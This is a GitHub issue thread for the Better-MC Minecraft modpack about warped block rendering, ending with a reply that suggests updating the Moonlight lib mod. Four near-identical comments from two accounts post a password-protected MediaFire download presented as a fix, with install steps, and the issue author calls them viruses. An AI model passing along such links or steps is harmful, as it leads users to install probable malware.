### ISSUE TITLE
Missing Visuals

### ISSUE THREAD

**Issue by copemhagen** [LunaPixelStudios/Better-MC#1829]
### Describe the Bug

Loaded in and the rendering of the scaffolding and oak leaves were warped.

### Reproduction Steps

1. turned off game
2. re-entered.
...

### Screenshots and Videos

![mcbug](https://github.com/user-attachments/assets/88d59144-02e1-4d20-8a1d-d1cff6714550)

### Operating System

Windows 11

### Minecraft Version

1.20.1

### Modloader

Forge

### Modpack Version

v28

### Other Mods

n/a

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by copemhagen** [comment]
These are all viruses. Is there legit help here??

**Comment by chorbintime** [comment]
update the moonlight lib mod to the latest version
